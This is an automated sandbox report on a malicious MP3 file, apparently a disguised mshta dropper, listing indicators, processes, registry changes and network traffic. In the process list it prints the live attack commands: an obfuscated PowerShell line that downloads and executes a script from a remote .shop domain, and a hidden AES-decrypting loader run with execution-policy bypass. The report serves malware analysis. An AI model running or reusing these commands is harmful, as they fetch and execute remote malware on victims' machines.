download: /st5.mp3

Full analysis: https://app.any.run/tasks/b26d2f69-abf3-42f5-9208-cba4fcbbde41
Verdict: Malicious activity
Analysis date: March 12, 2025, 13:33:08
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: audio/mpeg
File info: Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo
MD5: D590D5FBCAA161F835CC2477EEE96B3F
SHA1: 53B137A1DC980D53652992897D0AFE058B6E73E1
SHA256: 689026D41FFEBFAAA64A9854D17A635BA29B114E5D15C40FBBA7BF1B7EE6CA0C
SSDEEP: 98304:JrsSP1FkdpMKpVbx6Ag1JBNdD4QG4AIp2gKvUJUzvkFV+skrYL+7vfw9SVV6ioKs:utpwFr1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7612)
      • powershell.exe (PID: 5740)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 5740)
      • powershell.exe (PID: 1164)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1164)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 5740)
  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 5740)
    • Probably download files using WebClient

      • powershell.exe (PID: 5740)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 5740)
      • mshta.exe (PID: 7612)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 1164)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 5740)
      • mshta.exe (PID: 7612)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1164)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7612)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 5740)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7612)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 5740)
    • Checks proxy server information

      • mshta.exe (PID: 7612)
      • powershell.exe (PID: 1164)
    • Disables trace logs

      • powershell.exe (PID: 1164)
    • Returns hidden items found within a container (POWERSHELL)

      • conhost.exe (PID: 4120)
    • Creates a byte array (POWERSHELL)

      • powershell.exe (PID: 1164)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1164)
      • powershell.exe (PID: 5740)
    • Reads the software policy settings

      • slui.exe (PID: 7804)
      • slui.exe (PID: 3676)
    • Application launched itself

      • firefox.exe (PID: 1328)
      • firefox.exe (PID: 5384)
    • Manual execution by a user

      • firefox.exe (PID: 5384)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
No Malware configuration.

TRiD

.mp3 | LAME encoded MP3 audio (ID3 v2.x tag) (62.5)
.mp3 | MP3 audio (ID3 v2.x tag) (37.5)

EXIF

MPEG

MPEGAudioVersion: 1
AudioLayer: 3
AudioBitrate: 192 kbps
SampleRate: 44100
ChannelMode: Stereo
MSStereo: Off
IntensityStereo: Off
CopyrightFlag: -
OriginalMedia: -
Emphasis: None

ID3

Title: Igor Pumphonia - Deep Inside
Artist: Igor Pumphonia
RecordingTime: 2025
Genre: deephouse, techno
EncoderSettings: Lavf59.27.100
Composer: Igor Pumphonia
PublisherURL: https://www.jamendo.com
Publisher: https://www.jamendo.com
UserDefinedText: (Tagging time) 2025-01-19
EncodedBy: Jamendo:https://www.jamendo.com | LAME
Comment: https://www.jamendo.com cc_standard
FileURL: https://www.jamendo.com/en/track/2231198
ArtistURL: https://www.jamendo.com/en/artist/475967
CopyrightURL: http://creativecommons.org/licenses/by-nc-nd/3.0/
Copyright: http://creativecommons.org/licenses/by-nc-nd/3.0/
PictureMIMEType: image/jpg
PictureType: Front Cover
PictureDescription: Cover
Picture: (Binary data 11285 bytes, use -b option to extract)

Composite

DateTimeOriginal: 2025
Duration: 0:03:18 (approx)
No data.
All screenshots are available in the full report
Total processes: 156
Monitored processes: 18
Malicious processes: 2
Suspicious processes: 1

Behavior graph

start
mshta.exe
sppextcomobj.exe (no specs)
slui.exe (no specs)
powershell.exe (no specs)
conhost.exe (no specs)
powershell.exe
conhost.exe (no specs)
slui.exe (no specs)
firefox.exe (no specs), 11 instances

Process information

PID
CMD
Path
Indicators
Parent process
PID: 680
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5004 -childID 3 -isForBrowser -prefsHandle 4844 -prefMapHandle 4912 -prefsLen 31243 -prefMapSize 244583 -jsInitHandle 1332 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a134c533-445b-404f-a5b7-aba4ef428aa5} 1328 "\\.\pipe\gecko-crash-server-pipe.1328" 1b7cfafb850 tab
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
PID: 1164
CMD: "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command (Get-Variable E*t).Value.InvokeCommand.(((Get-Variable E*t).Value.InvokeCommand|Member|Where-Object{(Get-ChildItem Variable:/_).Value.Name -like '*ke*pt'}).Name)(([System.Net.WebClient]::New().DownloadString('https://pn1.gapdevoutlycitrus.shop/88e1f9c1ef43be859dd2f3c4e44b0139')))
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 1328
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe"
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
PID: 2140
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2148 -parentBuildID 20240213221259 -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 31031 -prefMapSize 244583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a75009e-9813-41f7-9d45-7a25c292598f} 1328 "\\.\pipe\gecko-crash-server-pipe.1328" 1b7ba980310 socket
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
PID: 2800
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3332
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4236 -childID 2 -isForBrowser -prefsHandle 4228 -prefMapHandle 4224 -prefsLen 36588 -prefMapSize 244583 -jsInitHandle 1332 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d1702e4-cc11-458e-a801-0d63d1445449} 1328 "\\.\pipe\gecko-crash-server-pipe.1328" 1b7cebdba10 tab
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
c:\windows\system32\crypt32.dll
PID: 3676
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 4120
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5384
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe"
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: explorer.exe
User: admin
Company: Mozilla Corporation
Integrity Level: MEDIUM
Description: Firefox
Exit code: 0
Version: 123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\program files\mozilla firefox\vcruntime140_1.dll
c:\windows\system32\bcrypt.dll
PID: 5740
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function ZuiZhPk($hFdoraZL){-split($hFdoraZL -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$AbieXTa=ZuiZhPk[…]yVcT=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((ZuiZhPk('78584B734A4869564178717A57615A57')),[byte[]]::new(16)).TransformFinalBlock($AbieXTa,0,$AbieXTa.Length)); & $yVcT.Substring(0,3) $yVcT.Substring(3)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events: 22 613
Read events: 22 595
Write events: 18
Delete events: 0

Modification events

(7612) mshta.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | Operation: write | Name: CachePrefix | Value:
(7612) mshta.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | Operation: write | Name: CachePrefix | Value: Cookie:
(7612) mshta.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | Operation: write | Name: CachePrefix | Value: Visited:
(1164) powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: EnableFileTracing | Value: 0
(1164) powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: EnableAutoFileTracing | Value: 0
(1164) powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: EnableConsoleTracing | Value: 0
(1164) powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: FileTracingMask | Value:
(1164) powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: ConsoleTracingMask | Value:
(1164) powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: MaxFileSize | Value: 1048576
(1164) powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: FileDirectory | Value: %windir%\tracing
Executable files: 0
Suspicious files: 161
Text files: 18
Unknown types: 0

Dropped files

PID
Process
Filename
Type
7612 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\st5[1].mp3 | -
MD5: - | SHA256: -
1328 | firefox.exe | C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin | -
MD5: - | SHA256: -
7612 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D077F3BA01F0F2293C650040B1B80D25_7A7CE3D23A3E2314C57AED2871CEC791 | binary
MD5: 4B54953AC8B7A09E849D59DB5075616B | SHA256: 4AEF9B9CA185AC94FA37AB376B9165E088BF540B7CCAA8B61B3700F9A8A314F1
7612 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B | binary
MD5: B15FCC3CE647D26D29B8B10DE0A81505 | SHA256: E92A6DF7D133688C996E64B5B119F25CB5D2C205146575A6C42896957C0223A6
7612 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B | binary
MD5: AEEAC18E777732930D47D24A1883CF21 | SHA256: 0051223934161B97AF6423D7E030723674C287E7C2BF312D78496C15D140062E
7612 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240 | binary
MD5: 94790F2D708AC46065BAFA1BFAFCB10B | SHA256: A5AACBE6510911CD7A6E1C3151F906BD2D4471FFF93E08BFB59D8498A388312C
7612 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D077F3BA01F0F2293C650040B1B80D25_7A7CE3D23A3E2314C57AED2871CEC791 | binary
MD5: F7A79D3D9117D9C49AA85F9F42163400 | SHA256: 317B54000777AE069C56DAF58774C7951FE2E9DF035BBDB181D88B6BDB325E49
5740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9RBH1ZI061NNRUAGZBEK.temp | binary
MD5: F3DA7E4E2A7C8FF8FBDF304097C5F2E9 | SHA256: B035929CA39FC05F6C35083C5C6C08E0A5A770000D42C8BC55F7D9A9F103AFBF
5740 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c3xhkvhs.psl.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5740 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fmmv4gep.zp1.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download the PCAP, analyze network streams, HTTP content and a lot more in the full report
HTTP(S) requests: 22
TCP/UDP connections: 62
DNS requests: 94
Threats: 2

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | - | unknown | - | whitelisted
7612 | mshta.exe | GET | 200 | 104.18.21.226:80 | http://ocsp.globalsign.com/rootr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCDQHuXxad%2F5c1K2Rl1mo%3D | - | unknown | - | whitelisted
7612 | mshta.exe | GET | 200 | 151.101.2.133:80 | http://ocsp2.globalsign.com/rootr3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCEQCB5auY5G81uRwv%2BheHGMha | - | unknown | - | whitelisted
7612 | mshta.exe | GET | 200 | 104.18.21.226:80 | http://ocsp.globalsign.com/gsgccr3ovtlsca2024/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBT%2BeHEVW1om2JjNh%2BetTEbfp%2BiVWQQU2tOoCEgMNDdY7uWndS5Z%2FNbcPDgCDAk0SgfF5XqJBRMySA%3D%3D | - | unknown | - | whitelisted
7252 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | - | unknown | - | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | - | unknown | - | whitelisted
7944 | backgroundTaskHost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | - | unknown | - | whitelisted
7252 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | - | unknown | - | whitelisted
- | - | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/canonical.html | - | unknown | - | whitelisted
- | - | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/success.txt?ipv4 | - | unknown | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 192.168.100.255:137 | - | - | - | whitelisted
2104 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5352 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
7612 | mshta.exe | 47.79.80.15:443 | default-voice-5.oss-ap-northeast-1.aliyuncs.com | WINDSTREAM | US | unknown
7612 | mshta.exe | 104.18.21.226:80 | ocsp.globalsign.com | CLOUDFLARENET | - | whitelisted
7612 | mshta.exe | 151.101.2.133:80 | ocsp2.globalsign.com | FASTLY | US | whitelisted
2112 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted


DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.46
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.194
  • 23.48.23.164
  • 23.48.23.173
whitelisted
default-voice-5.oss-ap-northeast-1.aliyuncs.com
  • 47.79.80.15
unknown
ocsp.globalsign.com
  • 104.18.21.226
  • 104.18.20.226
whitelisted
ocsp2.globalsign.com
  • 151.101.2.133
  • 151.101.194.133
  • 151.101.130.133
  • 151.101.66.133
whitelisted
client.wns.windows.com
  • 40.113.103.199
  • 40.115.3.253
whitelisted
login.live.com
  • 20.190.160.2
  • 40.126.32.72
  • 20.190.160.5
  • 20.190.160.132
  • 20.190.160.67
  • 20.190.160.64
  • 20.190.160.130
  • 40.126.32.134
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted

Threats

PID | Process | Class | Message
2196 | svchost.exe | Misc activity | ET INFO DNS Query to Alibaba Cloud CDN Domain (aliyuncs .com)
7612 | mshta.exe | Misc activity | ET INFO Observed Alibaba Cloud CDN Domain (aliyuncs .com in TLS SNI)
No debug info